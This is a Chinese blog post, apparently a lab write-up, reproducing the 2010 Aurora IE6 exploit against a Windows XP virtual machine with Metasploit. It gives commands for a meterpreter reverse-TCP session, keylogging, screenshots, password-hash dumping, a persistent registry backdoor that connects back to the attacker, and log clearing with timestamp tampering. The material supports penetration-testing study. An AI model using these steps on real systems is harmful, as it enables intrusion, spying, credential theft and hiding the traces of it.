Metasploit学习笔记之——用Metasploit模拟谷歌极光攻击

版权声明：本文为博主原创文章，未经博主允许不得转载。 https://blog.csdn.net/youkawa/article/details/42041815

Metasploit学习笔记之——极光攻击重现

本攻击重现是简化的一个攻击过程，省略了前期情报搜集阶段中外围信息搜索、主机探测与端口扫描、服务扫描与查点、网络漏洞扫描等工作，目的是在最短的时间内模拟渗透攻击的核心环节，是对后续的复杂网络渗透攻击和网络安全防护所做的前期工作。

1.      准备工作

1.1   攻击路线图

下图为此次实验的攻击路线图，主要实现了对内网主机的渗透攻击，攻击路线图如红色标线所示。

1.2   攻击环境

考虑到在metasploit中关于谷歌极光攻击的渗透攻击模块明确声明其只对IE6有效，所以当前实验环境中目标主机选择了XP系统。

 

攻击主机

操作系统：Windows 7Ultimate with sp1 x64

渗透攻击工具：MetasploitPro v4.10.0

目标主机

宿主主机：Windows 7Ultimate with sp1 x64

虚拟机：Vmwareworkstation 10.0.0

虚拟机镜像： WindowsXP Professional with SP3 X86

谷歌极光攻击IE漏洞编号

MSB-MS10-002

CVE-2010-0249

OSVDB-61697

 

1.3   准备工作

（1）查看攻击主机IP

Command: Start --> Run --> CMD --> ipconfig

 

（2）查看目标主机IP

Command: Start --> Run --> CMD --> ipconfig

 

（3）安装并运行Metasploit

 

等待几分钟让Metasploit完成初始化工作

 

从初始化界面中可以看到，Metasploit主要有五大模块组成。其中expploits是渗透攻击模块，此模块主要作用是利用风险的安全漏洞或配置弱点对远程目标系统进行攻击，以植入和运行攻击载荷，从而获得对远程目标系统的访问权。auxiliary是辅助模块，此模块为渗透测试的信息搜索环节提供了大量的辅助模块支持。payloads是攻击载荷模块，此模块的作用是在渗透攻击成功后上促使目标系统运行一段植入代码，为渗透攻击者打开在目标系统上的控制会话连接。encodes是编码器模块，此模块主要完成“坏字节”的去除和免杀工作。post后渗透攻击模块，主要支持在渗透攻击取得目标系统远程控制权之后，在受控系统中进行各式各样的后渗透攻击动作，比如获取敏感信息、进一步拓展、实施跳板攻击等。nops是空指令模块，空指令（NOP）是一些对程序运行状态不会造成任何实质性影响的空操作或无关操作指令。

2.      设置攻击选项

搜索关于谷歌极光攻击aurora相关的信息

Command: msf> search aurora 

 

可以看到Metasploit中有与极光攻击相关的漏洞利用模块，在exploit渗透攻击模块中。

Command: use exploit/windows/browser/ms10_002_aurora

 

查看与此渗透攻击模块相关的详细信息

Command: msf> info

从其描述（Description）中可以看到，此模块只有在IE6中才能可靠地运行，这也是我们选择XP作为攻击目标的原因。

 

显示针对此次exploit可以使用的payloads

Command: msfexploit(ms10_02_aurora) > show payloads

 

选择其中的一项可用的payload，查看相关信息，此处已reverse_tcp为例

Command: msfexploit(ms10_02_aurora) > infowindows/meterpreter/reverse_tcp

 

使用此payload

Command: msfexploit(ms10_02_aurora) >set PAYLOADwindows/meterpreter/reverse_tcp

 

查看此次攻击所需要配置的信息

Command: msf exploit(ms10_02_aurora) > show options

 

 

设置SRVHOST（攻击主机IP地址）、LHOST（监听主机的IP）、URIPATH（URI路径）

Command: msfexploit(ms10_02_aurora) >set SRVHOST 192.168.1.22

                      msfexploit(ms10_02_aurora) >set LHOST 192.168.1.22

                      msfexploit(ms10_02_aurora) >setURIPATH  aurora.html

3.      开始渗透攻击

Command: msfexploit(ms10_02_aurora) >exploit

 

在攻击目标主机中输入此URL

 

此时攻击主机metasploit控制台终端中可看到已经有目标主机上线，会话已经建立

 

查看已经存在的会话信息

Command: sessions –l

 

3.1   Migrate到其他进程

在aurora攻击中，利用的是IE的缓冲区溢出漏洞，exploit的时候IE会处于阻塞状态，若关闭IE则会话会马上终止，所以需要及时转移会话，继续保持对目标主机的控制。使用migrate可以将meterpreter会话从一个进程移植到另一个进程的内存空间中。

 

迁移到资源管理器进程（explorer.exe）中

 

 

4.      信息窃取

在迁移了会话之后，IE浏览器会自动关闭，这时候我们的shellcode已经注入到explorer.exe进程中。下一步即可进行信息窃取工作。

4.1 键盘监听

我们主要用meterpreter中的keylogrecorder模块对目标主机进行键盘监听。

Command: msf> run

 

Command: msf> runkeylogrecorder

此时如果目标主机有键盘输入事件，则相应的字符会被记录下来

 

需要结束键盘监听，只需按ctrl+c键

 

此时在C:\Users\youkaka\.msf4\logs\scripts\keylogrecorder目录下有相应的txt文件，打开文件可以看到监听到目标主机的键盘输入信息。

 

4.2 屏幕截屏

运行screenshot命令，即可实现对目标主机当前操作界面进行截屏

Command: meterpreter > screenshot

 

在攻击主机目录D:\metasploit\中即可看到文件名为woLdFrUK.jpeg的截屏图片

4.3 用scraper模块获取目标主机相关信息

用scraper模块下载跟目标主机系统相关的信息，包括网络通信情况、注册表信息和主机用户名及口令的哈希值等。

 

查看此模块的用法

Command: meterpreter > run scraper –h

运行scraper

Command: meterpreter > runscraper

 

运行结束之后可以在C:\Users\youkaka\.msf4\logs\scripts\scraper\192.168.213.133_20140926.582914287目录下找到相关的记录文件。

 

hash.txt中记录着目标主机的用户名和口令的哈希值

 

而network.txt中则记录着目标主机网络情况

另外还有dumplink模块获得目标主机最近进行的系统操作、访问文件和office文档的操作记录。用enum_applications模块获得目标主机安装的软件、安全更新域漏洞补丁的信息。

5.      后渗透攻击

后渗透攻击主要完成植入后门和内网渗透等工作，目的是以当前目标主机为跳板，拿下其他主机或者服务器的登陆权限。

由于Meterpreter是仅仅驻留在内存中的shellcode，一旦目标主机重启，将失去这台机器的控制权，如果管理员将利用的漏洞打上补丁，那重新入侵将变得困难。所以需要实施后渗透攻击，metasploit提供了persistence和metsvc等后渗透攻击模块，通过在目标主机上安装自启动和永久服务的方式长久地控制目标主机。

在此实验室中我们主要利用persistentce后渗透攻击模块植入后门。此模块会在注册表HKLM\Software\Microsoft\Windows\CurrentVersion\Run\添加键值，以达到自启动的目的。一下命令的参数中-X为指定启动方式为开机自启动，-i指定反向回连的时间间隔。

Command:  meterpreter > run persistence -X -i 5 -p 457-r 192.168.1.22

在执行以上命令后，目标主机会按指定的时间间隔反向回连攻击主机。为了测试，我们在攻击主机上建立meterpreter客户端，用于监听目标主机的连接。

 

Command:  msf exploit<ms10_002_aurora) > useexploit/multi/handler

 

6.      清理痕迹

虽然Meterpreter是工作于内存模式，但其对目标主机的相关操作总难免会产生日志并留下入侵痕迹。此时可以用Meterpreter中的clearv命令进行清除即可。

Command:  meterpreter >clearev

 

此外还可以用命令timestomp修改文件的创建时间、最后写入和最后访问的时间。

                                                               

7.      总结

7.1   已完成的工作

此实验主要完成了对内网主机的渗透攻击的工作。在攻击中针对目标主机的会话建立和迁移、键盘监听、屏幕截屏、用scarper模块获取目标主机信息、植入后门、清理痕迹等工作。实现了对目标主机的完全控制。这部分工作是APT攻击中非常重要的部分，为后续的攻击打下了基础。

7.2   不足

实验方案的不足。当前网络拓扑还稍显简单，后期复杂网络搭建的情况还有待进一步考虑。

Metasploit用于渗透攻击本身的不足。在后渗透攻击中，后门植入的方式太过于明显，稍有安全常识的人都能识破，更难绕过主动防御软件了。所以有必要对远程控制的shellcode进行特殊的免杀处理。

 

8.      参考资料

http://www.computersecuritystudent.com/SECURITY_TOOLS/Metasploit/lesson3/

转载请注明出处：http://blog.csdn.net/youkawa/article/details/42041815